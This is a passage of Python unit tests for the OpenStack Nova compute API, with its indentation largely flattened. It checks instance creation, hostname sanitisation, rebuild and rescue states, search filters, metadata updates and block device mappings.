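        # Verify _populate_instance_for_create seeds the expected vm/task
        # states, launch index, uuid and image system metadata.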
base_options = {'image_ref': self.fake_image['id'],
'system_metadata': {'fake': 'value'}}
instance = instance_obj.Instance()
instance.update(base_options)
inst_type = flavors.get_flavor_by_name("m1.tiny")
instance = self.compute_api._populate_instance_for_create(
instance,
self.fake_image,
1,
security_groups=None,
instance_type=inst_type)
self.assertEquals(str(base_options['image_ref']),
instance['system_metadata']['image_base_image_ref'])
self.assertEquals(vm_states.BUILDING, instance['vm_state'])
self.assertEquals(task_states.SCHEDULING, instance['task_state'])
self.assertEquals(1, instance['launch_index'])
self.assertIsNotNone(instance.get('uuid'))
self.assertEqual([], instance.security_groups.objects)
def test_default_hostname_generator(self):
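        # Hostnames should be sanitized from the display_name and default to
        # 'server-<uuid>' when no display_name is given.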
fake_uuids = [str(uuid.uuid4()) for x in xrange(4)]
orig_populate = self.compute_api._populate_instance_for_create
def _fake_populate(base_options, *args, **kwargs):
base_options['uuid'] = fake_uuids.pop(0)
return orig_populate(base_options, *args, **kwargs)
self.stubs.Set(self.compute_api,
'_populate_instance_for_create',
_fake_populate)
cases = [(None, 'server-%s' % fake_uuids[0]),
('Hello, Server!', 'hello-server'),
('<}\x1fh\x10e\x08l\x02l\x05o\x12!{>', 'hello'),
('hello_server', 'hello-server')]
for display_name, hostname in cases:
(ref, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image',
display_name=display_name)
try:
self.assertEqual(ref[0]['hostname'], hostname)
finally:
db.instance_destroy(self.context, ref[0]['uuid'])
def test_destroy_instance_disassociates_security_groups(self):
# Make sure destroying disassociates security groups.
group = self._create_group()
(ref, resv_id) = self.compute_api.create(
self.context,
instance_type=flavors.get_default_flavor(),
image_href='some-fake-image',
security_group=['testgroup'])
try:
db.instance_destroy(self.context, ref[0]['uuid'])
group = db.security_group_get(self.context, group['id'])
self.assertTrue(len(group['instances']) == 0)
finally:
db.security_group_destroy(self.context, group['id'])
def test_destroy_security_group_disassociates_instances(self):
# Make sure destroying security groups disassociates instances.
group = self._create_group()
(ref, resv_id) = self.compute_api.create(
self.context,
instance_type=flavors.get_default_flavor(),
image_href='some-fake-image',
security_group=['testgroup'])
try:
db.security_group_destroy(self.context, group['id'])
admin_deleted_context = context.get_admin_context(
read_deleted="only")
group = db.security_group_get(admin_deleted_context, group['id'])
self.assertTrue(len(group['instances']) == 0)
finally:
db.instance_destroy(self.context, ref[0]['uuid'])
def test_restore(self):
# Ensure instance can be restored from a soft delete.
instance, instance_uuid = self._run_instance(params={
'host': CONF.host,
'cell_name': 'foo'})
instance = instance_obj.Instance.get_by_uuid(
self.context, instance_uuid,
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS)
self.compute_api.soft_delete(self.context, instance)
instance.refresh()
self.assertEqual(instance.task_state, task_states.SOFT_DELETING)
# set the state that the instance gets when soft_delete finishes
instance.vm_state = vm_states.SOFT_DELETED
instance.task_state = None
instance.save()
# Ensure quotas are committed
self.mox.StubOutWithMock(nova.quota.QUOTAS, 'commit')
nova.quota.QUOTAS.commit(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.compute_api.restore(self.context, instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], task_states.RESTORING)
db.instance_destroy(self.context, instance['uuid'])
def _test_rebuild(self, vm_state):
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], None)
# Set some image metadata that should get wiped out and reset
# as well as some other metadata that should be preserved.
db.instance_system_metadata_update(self.context, instance_uuid,
{'image_kernel_id': 'old-data',
'image_ramdisk_id': 'old_data',
'image_something_else': 'old-data',
'image_should_remove': 'bye-bye',
'preserved': 'preserve this!'},
True)
# Make sure Compute API updates the image_ref before casting to
# compute manager.
orig_update = self.compute_api.update
info = {'image_ref': None}
def update_wrapper(*args, **kwargs):
if 'image_ref' in kwargs:
info['image_ref'] = kwargs['image_ref']
return orig_update(*args, **kwargs)
self.stubs.Set(self.compute_api, 'update', update_wrapper)
image_ref = instance["image_ref"] + '-new_image_ref'
password = "new_password"
db.instance_update(self.context, instance['uuid'],
{"vm_state": vm_state})
self.compute_api.rebuild(self.context, instance, image_ref, password)
self.assertEqual(info['image_ref'], image_ref)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], task_states.REBUILDING)
sys_metadata = db.instance_system_metadata_get(self.context,
instance_uuid)
self.assertEqual(sys_metadata,
{'image_kernel_id': 'fake_kernel_id',
'image_min_disk': '1',
'image_ramdisk_id': 'fake_ramdisk_id',
'image_something_else': 'meow',
'preserved': 'preserve this!'})
db.instance_destroy(self.context, instance['uuid'])
def test_rebuild(self):
self._test_rebuild(vm_state=vm_states.ACTIVE)
def test_rebuild_in_error_state(self):
self._test_rebuild(vm_state=vm_states.ERROR)
def test_rebuild_in_error_not_launched(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': ''}))
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"vm_state": vm_states.ERROR,
"launched_at": None})
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.rebuild,
self.context,
instance,
instance['image_ref'],
"new password")
def test_rebuild_no_image(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': ''}))
instance_uuid = instance['uuid']
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.compute.run_instance(self.context, instance=instance)
self.compute_api.rebuild(self.context, instance, '', 'new_password')
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], task_states.REBUILDING)
def test_rebuild_with_deleted_image(self):
# If we're given a deleted image by glance, we should not be able to
# rebuild from it
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
self.fake_image['name'] = 'fake_name'
self.fake_image['status'] = 'DELETED'
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
expected_message = (
exception.ImageNotActive.msg_fmt % {'image_id':
self.fake_image['id']})
with testtools.ExpectedException(exception.ImageNotActive,
expected_message):
self.compute_api.rebuild(self.context, instance,
self.fake_image['id'], 'new_password')
def test_rebuild_with_too_little_ram(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
def fake_extract_flavor(_inst):
return dict(memory_mb=64, root_gb=1)
self.stubs.Set(flavors, 'extract_flavor',
fake_extract_flavor)
self.fake_image['min_ram'] = 128
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeMemoryTooSmall,
self.compute_api.rebuild, self.context,
instance, self.fake_image['id'], 'new_password')
# Reduce image memory requirements and make sure it works
self.fake_image['min_ram'] = 64
self.compute_api.rebuild(self.context,
instance, self.fake_image['id'], 'new_password')
db.instance_destroy(self.context, instance['uuid'])
def test_rebuild_with_too_little_disk(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
def fake_extract_flavor(_inst):
return dict(memory_mb=64, root_gb=1)
self.stubs.Set(flavors, 'extract_flavor',
fake_extract_flavor)
self.fake_image['min_disk'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api.rebuild, self.context,
instance, self.fake_image['id'], 'new_password')
# Reduce image disk requirements and make sure it works
self.fake_image['min_disk'] = 1
self.compute_api.rebuild(self.context,
instance, self.fake_image['id'], 'new_password')
db.instance_destroy(self.context, instance['uuid'])
def test_rebuild_with_just_enough_ram_and_disk(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
def fake_extract_flavor(_inst):
return dict(memory_mb=64, root_gb=1)
self.stubs.Set(flavors, 'extract_flavor',
fake_extract_flavor)
self.fake_image['min_ram'] = 64
self.fake_image['min_disk'] = 1
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.compute_api.rebuild(self.context,
instance, self.fake_image['id'], 'new_password')
db.instance_destroy(self.context, instance['uuid'])
def test_rebuild_with_no_ram_and_disk_reqs(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
def fake_extract_flavor(_inst):
return dict(memory_mb=64, root_gb=1)
self.stubs.Set(flavors, 'extract_flavor',
fake_extract_flavor)
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.compute_api.rebuild(self.context,
instance, self.fake_image['id'], 'new_password')
db.instance_destroy(self.context, instance['uuid'])
def test_rebuild_with_too_large_image(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
def fake_extract_flavor(_inst):
return dict(memory_mb=64, root_gb=1)
self.stubs.Set(flavors, 'extract_flavor',
fake_extract_flavor)
self.fake_image['size'] = '1073741825'
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api.rebuild, self.context,
instance, self.fake_image['id'], 'new_password')
# Reduce image to 1 GB limit and ensure it works
self.fake_image['size'] = '1073741824'
self.compute_api.rebuild(self.context,
instance, self.fake_image['id'], 'new_password')
db.instance_destroy(self.context, instance['uuid'])
def test_hostname_create(self):
# Ensure instance hostname is set during creation.
inst_type = flavors.get_flavor_by_name('m1.tiny')
(instances, _) = self.compute_api.create(self.context,
inst_type,
image_href='some-fake-image',
display_name='test host')
self.assertEqual('test-host', instances[0]['hostname'])
def test_set_admin_password(self):
# Ensure instance can have its admin password set.
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
inst_ref = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(inst_ref['vm_state'], vm_states.ACTIVE)
self.assertEqual(inst_ref['task_state'], None)
def fake_rpc_method(context, topic, msg, do_cast=True):
self.assertFalse(do_cast)
self.stubs.Set(rpc, 'call', fake_rpc_method)
self.compute_api.set_admin_password(self.context, inst_ref)
inst_ref = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(inst_ref['vm_state'], vm_states.ACTIVE)
self.assertEqual(inst_ref['task_state'],
task_states.UPDATING_PASSWORD)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(inst_ref))
def test_rescue_unrescue(self):
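        # Rescue and unrescue should set the RESCUING/UNRESCUING task states.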
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['vm_state'], vm_states.ACTIVE)
self.assertEqual(instance['task_state'], None)
self.compute_api.rescue(self.context, instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['vm_state'], vm_states.ACTIVE)
self.assertEqual(instance['task_state'], task_states.RESCUING)
params = {'vm_state': vm_states.RESCUED, 'task_state': None}
db.instance_update(self.context, instance_uuid, params)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.compute_api.unrescue(self.context, instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['vm_state'], vm_states.RESCUED)
self.assertEqual(instance['task_state'], task_states.UNRESCUING)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def test_rescue_volume_backed(self):
# Instance started without an image
volume_backed_inst_1 = jsonutils.to_primitive(
self._create_fake_instance({'image_ref': ''}))
# Instance started with a placeholder image (for metadata)
volume_backed_inst_2 = jsonutils.to_primitive(
self._create_fake_instance(
{'image_ref': 'my_placeholder_img',
'root_device_name': '/dev/vda'})
)
def fake_get_instance_bdms(*args, **kwargs):
return [{'device_name': '/dev/vda',
'source_type': 'volume',
'boot_index': 0,
'destination_type': 'volume',
'volume_id': 'bf0b6b00-a20c-11e2-9e96-0800200c9a66'}]
self.stubs.Set(self.compute_api, 'get_instance_bdms',
fake_get_instance_bdms)
def fake_volume_get(self, context, volume_id):
return {'id': volume_id, 'status': 'in-use'}
self.stubs.Set(cinder.API, 'get', fake_volume_get)
self.compute.run_instance(self.context,
instance=volume_backed_inst_1)
self.compute.run_instance(self.context,
instance=volume_backed_inst_2)
self.assertRaises(exception.InstanceNotRescuable,
self.compute_api.rescue, self.context,
volume_backed_inst_1)
self.assertRaises(exception.InstanceNotRescuable,
self.compute_api.rescue, self.context,
volume_backed_inst_2)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(volume_backed_inst_1))
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(volume_backed_inst_2))
def test_get(self):
# Test get instance.
exp_instance = self._create_fake_instance()
# NOTE(danms): Transform the db object in a similar way as
# the API method will do.
expected = obj_base.obj_to_primitive(
instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), exp_instance,
instance_obj.INSTANCE_DEFAULT_FIELDS + ['fault']))
def fake_db_get(_context, _instance_uuid, columns_to_join=None):
return exp_instance
self.stubs.Set(db, 'instance_get_by_uuid', fake_db_get)
instance = self.compute_api.get(self.context, exp_instance['uuid'])
self.assertEquals(unify_instance(expected),
unify_instance(instance))
def test_get_with_admin_context(self):
# Test get instance.
c = context.get_admin_context()
exp_instance = self._create_fake_instance()
# NOTE(danms): Transform the db object in a similar way as
# the API method will do.
expected = obj_base.obj_to_primitive(
instance_obj.Instance._from_db_object(
c, instance_obj.Instance(), exp_instance,
instance_obj.INSTANCE_DEFAULT_FIELDS + ['fault']))
def fake_db_get(context, instance_uuid, columns_to_join=None):
return exp_instance
self.stubs.Set(db, 'instance_get_by_uuid', fake_db_get)
instance = self.compute_api.get(c, exp_instance['uuid'])
self.assertEquals(unify_instance(expected),
unify_instance(instance))
def test_get_with_integer_id(self):
# Test get instance with an integer id.
exp_instance = self._create_fake_instance()
# NOTE(danms): Transform the db object in a similar way as
# the API method will do.
expected = obj_base.obj_to_primitive(
instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), exp_instance,
instance_obj.INSTANCE_DEFAULT_FIELDS + ['fault']))
def fake_db_get(_context, _instance_id, columns_to_join=None):
return exp_instance
self.stubs.Set(db, 'instance_get', fake_db_get)
instance = self.compute_api.get(self.context, exp_instance['id'])
self.assertEquals(unify_instance(expected),
unify_instance(instance))
def test_get_all_by_name_regexp(self):
# Test searching instances by name (display_name).
c = context.get_admin_context()
instance1 = self._create_fake_instance({'display_name': 'woot'})
instance2 = self._create_fake_instance({
'display_name': 'woo'})
instance3 = self._create_fake_instance({
'display_name': 'not-woot'})
instances = self.compute_api.get_all(c,
search_opts={'name': '^woo.*'})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance1['uuid'] in instance_uuids)
self.assertTrue(instance2['uuid'] in instance_uuids)
instances = self.compute_api.get_all(c,
search_opts={'name': '^woot.*'})
instance_uuids = [instance['uuid'] for instance in instances]
self.assertEqual(len(instances), 1)
self.assertTrue(instance1['uuid'] in instance_uuids)
instances = self.compute_api.get_all(c,
search_opts={'name': '.*oot.*'})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance1['uuid'] in instance_uuids)
self.assertTrue(instance3['uuid'] in instance_uuids)
instances = self.compute_api.get_all(c,
search_opts={'name': '^n.*'})
self.assertEqual(len(instances), 1)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance3['uuid'] in instance_uuids)
instances = self.compute_api.get_all(c,
search_opts={'name': 'noth.*'})
self.assertEqual(len(instances), 0)
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
def test_get_all_by_multiple_options_at_once(self):
# Test searching by multiple options at once.
c = context.get_admin_context()
network_manager = fake_network.FakeNetworkManager()
self.stubs.Set(self.compute_api.network_api,
'get_instance_uuids_by_ip_filter',
network_manager.get_instance_uuids_by_ip_filter)
instance1 = self._create_fake_instance({
'display_name': 'woot',
'id': 1,
'uuid': '00000000-0000-0000-0000-000000000010'})
instance2 = self._create_fake_instance({
'display_name': 'woo',
'id': 20,
'uuid': '00000000-0000-0000-0000-000000000020'})
instance3 = self._create_fake_instance({
'display_name': 'not-woot',
'id': 30,
'uuid': '00000000-0000-0000-0000-000000000030'})
# ip ends up matching 2nd octet here.. so all 3 match ip
# but 'name' only matches one
instances = self.compute_api.get_all(c,
search_opts={'ip': '.*\.1', 'name': 'not.*'})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance3['uuid'])
        # ip ends up matching any ip with a '1' in the last octet,
        # so instances 1 and 3 match on ip, but 'name' only matches #1
instances = self.compute_api.get_all(c,
search_opts={'ip': '.*\.1$', 'name': '^woo.*'})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance1['uuid'])
        # same as above but no overall match (name matches instance1
        # but the ip query doesn't)
instances = self.compute_api.get_all(c,
search_opts={'ip': '.*\.2$', 'name': '^woot.*'})
self.assertEqual(len(instances), 0)
# ip matches all 3... ipv6 matches #2+#3...name matches #3
instances = self.compute_api.get_all(c,
search_opts={'ip': '.*\.1',
'name': 'not.*',
'ip6': '^.*12.*34.*'})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance3['uuid'])
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
def test_get_all_by_image(self):
# Test searching instances by image.
c = context.get_admin_context()
instance1 = self._create_fake_instance({'image_ref': '1234'})
instance2 = self._create_fake_instance({'image_ref': '4567'})
instance3 = self._create_fake_instance({'image_ref': '4567'})
instances = self.compute_api.get_all(c, search_opts={'image': '123'})
self.assertEqual(len(instances), 0)
instances = self.compute_api.get_all(c, search_opts={'image': '1234'})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance1['uuid'])
instances = self.compute_api.get_all(c, search_opts={'image': '4567'})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance2['uuid'] in instance_uuids)
self.assertTrue(instance3['uuid'] in instance_uuids)
# Test passing a list as search arg
instances = self.compute_api.get_all(c,
search_opts={'image': ['1234', '4567']})
self.assertEqual(len(instances), 3)
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
def test_get_all_by_flavor(self):
        # Test searching instances by flavor.
c = context.get_admin_context()
instance1 = self._create_fake_instance({'instance_type_id': 1})
instance2 = self._create_fake_instance({'instance_type_id': 2})
instance3 = self._create_fake_instance({'instance_type_id': 2})
# NOTE(comstud): Migrations set up the instance_types table
# for us. Therefore, we assume the following is true for
# these tests:
# instance_type_id 1 == flavor 3
# instance_type_id 2 == flavor 1
# instance_type_id 3 == flavor 4
# instance_type_id 4 == flavor 5
# instance_type_id 5 == flavor 2
instances = self.compute_api.get_all(c,
search_opts={'flavor': 5})
self.assertEqual(len(instances), 0)
# ensure unknown filter maps to an exception
self.assertRaises(exception.FlavorNotFound,
self.compute_api.get_all, c,
search_opts={'flavor': 99})
instances = self.compute_api.get_all(c, search_opts={'flavor': 3})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['id'], instance1['id'])
instances = self.compute_api.get_all(c, search_opts={'flavor': 1})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance2['uuid'] in instance_uuids)
self.assertTrue(instance3['uuid'] in instance_uuids)
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
def test_get_all_by_state(self):
# Test searching instances by state.
c = context.get_admin_context()
instance1 = self._create_fake_instance({
'power_state': power_state.SHUTDOWN,
})
instance2 = self._create_fake_instance({
'power_state': power_state.RUNNING,
})
instance3 = self._create_fake_instance({
'power_state': power_state.RUNNING,
})
instances = self.compute_api.get_all(c,
search_opts={'power_state': power_state.SUSPENDED})
self.assertEqual(len(instances), 0)
instances = self.compute_api.get_all(c,
search_opts={'power_state': power_state.SHUTDOWN})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance1['uuid'])
instances = self.compute_api.get_all(c,
search_opts={'power_state': power_state.RUNNING})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance2['uuid'] in instance_uuids)
self.assertTrue(instance3['uuid'] in instance_uuids)
# Test passing a list as search arg
instances = self.compute_api.get_all(c,
search_opts={'power_state': [power_state.SHUTDOWN,
power_state.RUNNING]})
self.assertEqual(len(instances), 3)
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
def test_get_all_by_metadata(self):
# Test searching instances by metadata.
c = context.get_admin_context()
instance0 = self._create_fake_instance()
instance1 = self._create_fake_instance({
'metadata': {'key1': 'value1'}})
instance2 = self._create_fake_instance({
'metadata': {'key2': 'value2'}})
instance3 = self._create_fake_instance({
'metadata': {'key3': 'value3'}})
instance4 = self._create_fake_instance({
'metadata': {'key3': 'value3',
'key4': 'value4'}})
# get all instances
instances = self.compute_api.get_all(c,
search_opts={'metadata': {}})
self.assertEqual(len(instances), 5)
# wrong key/value combination
instances = self.compute_api.get_all(c,
search_opts={'metadata': {'key1': 'value3'}})
self.assertEqual(len(instances), 0)
# non-existing keys
instances = self.compute_api.get_all(c,
search_opts={'metadata': {'key5': 'value1'}})
self.assertEqual(len(instances), 0)
# find existing instance
instances = self.compute_api.get_all(c,
search_opts={'metadata': {'key2': 'value2'}})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance2['uuid'])
instances = self.compute_api.get_all(c,
search_opts={'metadata': {'key3': 'value3'}})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance3['uuid'] in instance_uuids)
self.assertTrue(instance4['uuid'] in instance_uuids)
# multiple criteria as a dict
instances = self.compute_api.get_all(c,
search_opts={'metadata': {'key3': 'value3',
'key4': 'value4'}})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance4['uuid'])
# multiple criteria as a list
instances = self.compute_api.get_all(c,
search_opts={'metadata': [{'key4': 'value4'},
{'key3': 'value3'}]})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance4['uuid'])
db.instance_destroy(c, instance0['uuid'])
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
db.instance_destroy(c, instance4['uuid'])
def test_all_instance_metadata(self):
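        # Metadata listing should be scoped to the caller's user/project;
        # an admin context sees metadata from all projects.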
instance1 = self._create_fake_instance({'metadata': {'key1': 'value1'},
'user_id': 'user1',
'project_id': 'project1'})
instance2 = self._create_fake_instance({'metadata': {'key2': 'value2'},
'user_id': 'user2',
'project_id': 'project2'})
_context = self.context
_context.user_id = 'user1'
_context.project_id = 'project1'
metadata = self.compute_api.get_all_instance_metadata(_context,
search_filts=[])
self.assertTrue(len(metadata) == 1)
self.assertEqual(metadata[0]['key'], 'key1')
_context.user_id = 'user2'
_context.project_id = 'project2'
metadata = self.compute_api.get_all_instance_metadata(_context,
search_filts=[])
self.assertTrue(len(metadata) == 1)
self.assertEqual(metadata[0]['key'], 'key2')
_context = context.get_admin_context()
metadata = self.compute_api.get_all_instance_metadata(_context,
search_filts=[])
self.assertTrue(len(metadata) == 2)
def test_instance_metadata(self):
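        # Verify metadata get/update/delete, the diffs passed to the compute
        # RPC API and the notifications emitted for each change.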
meta_changes = [None]
self.flags(notify_on_state_change='vm_state')
def fake_change_instance_metadata(inst, ctxt, diff, instance=None,
instance_uuid=None):
meta_changes[0] = diff
self.stubs.Set(compute_rpcapi.ComputeAPI, 'change_instance_metadata',
fake_change_instance_metadata)
_context = context.get_admin_context()
instance = self._create_fake_instance({'metadata': {'key1': 'value1'}})
instance = dict(instance.iteritems())
metadata = self.compute_api.get_instance_metadata(_context, instance)
self.assertEqual(metadata, {'key1': 'value1'})
self.compute_api.update_instance_metadata(_context, instance,
{'key2': 'value2'})
metadata = self.compute_api.get_instance_metadata(_context, instance)
self.assertEqual(metadata, {'key1': 'value1', 'key2': 'value2'})
self.assertEqual(meta_changes, [{'key2': ['+', 'value2']}])
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 1)
msg = fake_notifier.NOTIFICATIONS[0]
payload = msg.payload
self.assertTrue('metadata' in payload)
self.assertEquals(payload['metadata'], metadata)
new_metadata = {'key2': 'bah', 'key3': 'value3'}
self.compute_api.update_instance_metadata(_context, instance,
new_metadata, delete=True)
metadata = self.compute_api.get_instance_metadata(_context, instance)
self.assertEqual(metadata, new_metadata)
self.assertEqual(meta_changes, [{
'key1': ['-'],
'key2': ['+', 'bah'],
'key3': ['+', 'value3'],
}])
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[1]
payload = msg.payload
self.assertTrue('metadata' in payload)
self.assertEquals(payload['metadata'], metadata)
self.compute_api.delete_instance_metadata(_context, instance, 'key2')
metadata = self.compute_api.get_instance_metadata(_context, instance)
self.assertEqual(metadata, {'key3': 'value3'})
self.assertEqual(meta_changes, [{'key2': ['-']}])
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 3)
msg = fake_notifier.NOTIFICATIONS[2]
payload = msg.payload
self.assertTrue('metadata' in payload)
self.assertEquals(payload['metadata'], {})
db.instance_destroy(_context, instance['uuid'])
def test_disallow_metadata_changes_during_building(self):
def fake_change_instance_metadata(inst, ctxt, diff, instance=None,
instance_uuid=None):
pass
self.stubs.Set(compute_rpcapi.ComputeAPI, 'change_instance_metadata',
fake_change_instance_metadata)
instance = self._create_fake_instance({'vm_state': vm_states.BUILDING})
instance = dict(instance)
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.delete_instance_metadata, self.context,
instance, "key")
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.update_instance_metadata, self.context,
instance, "key")
def test_get_instance_faults(self):
        # Get an instance's latest fault.
instance = self._create_fake_instance()
fault_fixture = {
'code': 404,
'instance_uuid': instance['uuid'],
'message': "HTTPNotFound",
'details': "Stock details for test",
'created_at': datetime.datetime(2010, 10, 10, 12, 0, 0),
}
def return_fault(_ctxt, instance_uuids):
return dict.fromkeys(instance_uuids, [fault_fixture])
self.stubs.Set(nova.db,
'instance_fault_get_by_instance_uuids',
return_fault)
_context = context.get_admin_context()
output = self.compute_api.get_instance_faults(_context, [instance])
expected = {instance['uuid']: [fault_fixture]}
self.assertEqual(output, expected)
db.instance_destroy(_context, instance['uuid'])
@staticmethod
def _parse_db_block_device_mapping(bdm_ref):
attr_list = ('delete_on_termination', 'device_name', 'no_device',
'virtual_name', 'volume_id', 'volume_size', 'snapshot_id')
bdm = {}
for attr in attr_list:
val = bdm_ref.get(attr, None)
if val:
bdm[attr] = val
return bdm
def test_update_block_device_mapping(self):
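        # Image mappings and explicit BDMs should be merged, with explicit
        # entries overriding the flavor's swap/ephemeral defaults.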
swap_size = ephemeral_size = 1
instance_type = {'swap': swap_size, 'ephemeral_gb': ephemeral_size}
instance = self._create_fake_instance()
mappings = [
{'virtual': 'ami', 'device': 'sda1'},
{'virtual': 'root', 'device': '/dev/sda1'},
{'virtual': 'swap', 'device': 'sdb4'},
{'virtual': 'swap', 'device': 'sdb3'},
{'virtual': 'swap', 'device': 'sdb2'},
{'virtual': 'swap', 'device': 'sdb1'},
{'virtual': 'ephemeral0', 'device': 'sdc1'},
{'virtual': 'ephemeral1', 'device': 'sdc2'},
{'virtual': 'ephemeral2', 'device': 'sdc3'}]
block_device_mapping = [
# root
{'device_name': '/dev/sda1',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '00000000-aaaa-bbbb-cccc-000000000000',
'delete_on_termination': False},
# overwrite swap
{'device_name': '/dev/sdb2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '11111111-aaaa-bbbb-cccc-111111111111',
'delete_on_termination': False},
{'device_name': '/dev/sdb3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '22222222-aaaa-bbbb-cccc-222222222222'},
{'device_name': '/dev/sdb4',
'no_device': True},
# overwrite ephemeral
{'device_name': '/dev/sdc1',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '33333333-aaaa-bbbb-cccc-333333333333',
'delete_on_termination': False},
{'device_name': '/dev/sdc2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '33333333-aaaa-bbbb-cccc-444444444444',
'delete_on_termination': False},
{'device_name': '/dev/sdc3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '44444444-aaaa-bbbb-cccc-555555555555'},
{'device_name': '/dev/sdc4',
'no_device': True},
# volume
{'device_name': '/dev/sdd1',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '55555555-aaaa-bbbb-cccc-666666666666',
'delete_on_termination': False},
{'device_name': '/dev/sdd2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '66666666-aaaa-bbbb-cccc-777777777777'},
{'device_name': '/dev/sdd3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '77777777-aaaa-bbbb-cccc-888888888888'},
{'device_name': '/dev/sdd4',
'no_device': True}]
image_mapping = self.compute_api._prepare_image_mapping(
instance_type, instance['uuid'], mappings)
self.compute_api._update_block_device_mapping(
